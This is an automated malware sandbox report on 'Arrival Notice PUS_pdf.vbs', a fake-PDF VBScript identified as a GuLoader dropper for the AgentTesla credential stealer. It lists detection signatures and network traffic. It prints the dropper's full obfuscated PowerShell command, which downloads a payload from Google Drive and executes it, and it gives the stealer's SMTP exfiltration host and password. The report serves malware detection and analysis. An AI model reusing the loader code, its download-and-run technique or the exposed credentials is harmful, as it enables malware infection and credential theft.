Windows Analysis Report
Arrival Notice PUS_pdf.vbs

Overview

General Information

Sample name: Arrival Notice PUS_pdf.vbs
Analysis ID: 1427934
MD5: addc13066aacdb6cdb21ae368bce83d2
SHA1: d4d509e48e946e01605df86bfebf8f4cbc4648f7
SHA256: 9c8fb0ee8d5a21346a7e25567abd4155c543d90a213a40d79269d1c4d3b269be
Tags: Formbookvbs

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7468 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 7572 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. 
AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam ndDrawbepub.ir BrdssTreet[Hyper$AnspoS offetRemineStil,nFrilsoBolt tForlaaGrounp Pse,hopregr ExhauCubi.m ,occ]Under=Udkla$Uds.yBChinkr EpidoBear.d S.nufRaffir,recas Info ');$Dandy=Banuyo17 'CalvrKFremtrDaab,eDri,hm agneegtefor AcqueTusintro,an. 
A,icD UdsaospektwUlt,an VelolMo,dno,oniraFlattd ReasFMlke.iKlarhlSelv eDelag(Sero,$ BysbAIncogm SprupVaskeuFodertRets ablacktUreosiCholuoStepdnIlyapeUnbl,rHuara,Quaif$ ngrasNautieCuratmjuvaviReminp Ne,brBenedoSprjtv ,ermeUnsynn Ulis) .ope ';$Dandy=$Fuldmaaner[1]+$Dandy;$semiproven=$Fuldmaaner[0];decoupled (Banuyo17 'almo,$BrevagneighlSpa robruntbLithoaRegralPulld:BureaUUnsymnundoudAf ameProgrrDemeas UnretForb.eKo,temStatsm D.rge TilsnFabri=Natur(.itioTPrei,eBricks Vi etMolek-DespoPso,edaHeatithofteh Lido Guess$Ph llsUnchre AssomGenneiGer.ipcrimsrSt,ngo Vaa,vtrreheStor,nhavne)Overe ');while (!$Understemmen) {decoupled (Banuyo17 'Tilgo$svigeg starl sko o EvadbArariaAgurkl rets:tri oNclo.pa Twirs Sm,dtRegioiSprogeEnergs.orgatMistr=Indef$StenttReklarDialeuCherueBh is ') ;decoupled $Dandy;decoupled (Banuyo17 'T,gseSMeto.tHyperaPre.erFrisktC,alm-MacroSS,inelBesseeGuth,eUnfurpTaler My.l4Phase ');decoupled (Banuyo17 ' Card$Unsipgprdikl I.peo T,efb binaaH.sdel le s: GlasUSweetnOnerodO erheFjendrReprosProvetPalpaeAlit.mM.stim u.ele.deelnLeven= Hj f(InestTProgreUdenos FrsttTilsl- C ilPWraina Pod tSvipthRoere s bcy$M.untsOesopeBombamRubini OutdpImpolrSb,booRhiz.vMalere R conArkad)Liban ') ;decoupled (Banuyo17 'Coun $Bruttg.ommel ,ardo Ess,bIagttaCelebl Domi:DiamoTdithirTineauIndklgD koleEghj,nMatriePommesOitic=Semi.$Acce,gGarrolBo,dhoCalmsbFunktaW,llilAmimi: Ls,iSAkup aKonkumOverls,yttesD.kup+ Fina+darwi%Sooge$EyingBCheboo MemotInb orInd ey Wedgl Fa.il Lu.ti IncidP,ecea ConfeTrihy.SkrigcMesitoAf,enu PagonStutftBevel ') ;$Amputationer=$Botryllidae[$Trugenes];}decoupled (Banuyo17 'Compu$Multig .ydalPremioNinjab scataKuglelP rfe:Pew.nNAngreaMezenz ImpeaDaah r,apani IlsetUnemai AporsRe tomTappi Cell =Cykel RegleGE,igoeFor.ut Rev.-MattiCManu oRottinunh,ct IdioeindusnBinaetResyn ,akul$Kontasend.ge Vil.m Sal.iKautipFialer KonfoAm.unvBolsteBagsdn Whi, ');decoupled (Banuyo17 'Milit$DdssygDjthalRgelsoDualmbS.arcaAuxollBroch:SlgtnViteruvT nfoeoverctBellas G ab Haver=Forh, 
Udbri[UndslSChittyteksts P.eatKogekeNo.com Tids.SquamCBr,ndoExternStatevNordseM,ssirEjendt Auto]No me:Lumba:SorbuF GstfrCaly.oFortrmNavneBKdfula Unbrs OutgeOo,on6 ate4 PhreSSmu,st MoldrKloakiAlimenSavarg Uroc(Svovl$ BracNI fikaPacanz ubea T anrdildeiAffectB,odaiJ,rvis UsikmGets.)Fejld ');decoupled (Banuyo17 'Passa$ B,angHaimal elfloUdradbJessea EngolVirus:HemauOUdenovPettiePleskr Synss,fterl RetraWind,cDatalk rosk Stri.= Te,o Supra[LsengS.icroy ubves to.atSletheOrchimFestl. SpisThuskeei.fanxBolewtS,ovf.UncivEOvertnRewe,cFaktooStatsdAttesi GlipnShawngTppef] C,bm:P.ede: aturASunstS gin,C dereI T.skICarth.MisauG RodeeUpshotHuskaSGroott.illirEuromiImpisnhennegHal,p(Fortr$ P,liV PorcvbaryleLydset Vests Grun)Metab ');decoupled (Banuyo17 'Syvaa$ PrudgacronlSurinoDigambImp ga irkelAgate:BendaBLo.giuR,erlr MitinSammefUnrusiBerggrSupereNonem=Nymph$FirblO Bes,vFork,eLums.r TiewsinduslR wina.nmelcStempk her .ume.dsFryt,u astb V,rms F,retLmb.rrSkamfi umbonAs,ongParei(Ic nh3Bl,dp0toptr5Fil.p7Priva0Folke6Linie,Painf2kalib9Fleet9Super6C,rom1Dinne)Tack. ');decoupled $Burnfire;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7840 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 8108 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" followed by the same obfuscated command line as PID 7660 above, MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7192 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7228 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware configuration:
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.myhydropowered.com", "Username": "africa@myhydropowered.com", "Password": "q5NHtWyc5WKhunX"}
Source | Rule | Description | Author | Strings
00000009.00000002.2017192523.0000000008C40000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
0000000C.00000002.2645999528.0000000025C45000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000C.00000002.2645999528.0000000025C45000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000C.00000002.2645999528.0000000025C6C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000C.00000002.2627141009.0000000004605000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security

            Source | Rule | Description | Author | Strings
            amsi32_8108.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
            • 0xdfe4:$b2: ::FromBase64String(
            • 0xd0bf:$s1: -join
            • 0x686b:$s4: +=
            • 0x692d:$s4: +=
            • 0xab54:$s4: +=
            • 0xcc71:$s4: +=
            • 0xcf5b:$s4: +=
            • 0xd0a1:$s4: +=
            • 0x173d0:$s4: +=
            • 0x17450:$s4: +=
            • 0x17516:$s4: +=
            • 0x17596:$s4: +=
            • 0x1776c:$s4: +=
            • 0x177f0:$s4: +=
            • 0xd88f:$e4: Get-WmiObject
            • 0xda7e:$e4: Get-Process
            • 0xdad6:$e4: Start-Process
            • 0x15ef2:$e4: Get-Process

            System Summary

            Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs", CommandLine|base64offset|contains: 6bq, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs", ProcessId: 7468, ProcessName: wscript.exe
            Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs", CommandLine|base64offset|contains: 6bq, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs", ProcessId: 7468, ProcessName: wscript.exe
            Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" followed by the same obfuscated command line as PID 7660 in the process tree (cut off in the report)
            No Snort rule has matched

            AV Detection

            Source: http://pesterbdd.com/images/Pester.png, URL Reputation: Label: malware
            Source: wscript.exe.7468.1.memstrmin, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.myhydropowered.com", "Username": "africa@myhydropowered.com", "Password": "q5NHtWyc5WKhunX"}
            Source: mail.myhydropowered.com, Virustotal: Detection: 5%
            Source: Arrival Notice PUS_pdf.vbs, ReversingLabs: Detection: 13%
            Source: Arrival Notice PUS_pdf.vbs, Virustotal: Detection: 15%
            Source: unknown, HTTPS traffic detected: 142.251.15.139:443 -> 192.168.2.9:49707 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 142.250.105.132:443 -> 192.168.2.9:49708 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 142.251.15.139:443 -> 192.168.2.9:49713 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 142.250.105.132:443 -> 192.168.2.9:49714 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.9:49715 version: TLS 1.2
            Source: Binary string: qm.Core.pdb source: powershell.exe, 00000009.00000002.2010987312.0000000007872000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000009.00000002.2010987312.0000000007807000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000009.00000002.2003068899.0000000003320000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: global traffic, HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
            Source: Joe Sandbox View, IP Address: 208.95.112.1
            Source: Joe Sandbox View, IP Address: 104.26.13.205
            Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknown, DNS query: name: api.ipify.org
            Source: unknown, DNS query: name: ip-api.com
            Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Connection: Keep-Alive
            Source: global traffic, HTTP traffic detected: GET /download?id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.usercontent.google.com | Connection: Keep-Alive
            Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Cache-Control: no-cache
            Source: global traffic, HTTP traffic detected: GET /download?id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
            Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown, DNS traffic detected: queries for: drive.google.com
            Source: powershell.exe, 00000009.00000002.2003068899.00000000032BF000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.microsoft
            Source: wscript.exe, 00000001.00000003.1345209659.00000171D0371000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://ctldl.windowsupdate.com/
            Source: wscript.exe, 00000001.00000003.1462009599.00000171CE2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1463253642.00000171CE389000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: wscript.exe, 00000001.00000003.1462009599.00000171CE2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1463253642.00000171CE389000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1346641389.00000171D0334000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1346068233.00000171D030C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1463388260.00000171D0280000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: wscript.exe, 00000001.00000003.1346068233.00000171D030C000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?11a65f450b971
            Source: wscript.exe, 00000001.00000003.1346468271.00000171D02E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1346289034.00000171D02C1000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?11a65f450b
            Source: powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://drive.google.com
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233D7000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://drive.usercontent.google.com
            Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000003.00000002.2266575309.00000189215F1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000003.00000002.2266575309.00000189215F1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000003.00000002.2266575309.0000018923399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
            Source: powershell.exe, 00000003.00000002.2266575309.0000018922EAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
            Source: powershell.exe, 00000003.00000002.2266575309.0000018921817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DRP
            Source: powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DRXR
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR&export=download
            Source: powershell.exe, 00000003.00000002.2266575309.0000018921A7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.comhP
            Source: powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000003.00000002.2266575309.0000018922882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownHTTPS traffic detected: 142.251.15.139:443 -> 192.168.2.9:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.105.132:443 -> 192.168.2.9:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.15.139:443 -> 192.168.2.9:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.105.132:443 -> 192.168.2.9:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.9:49715 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

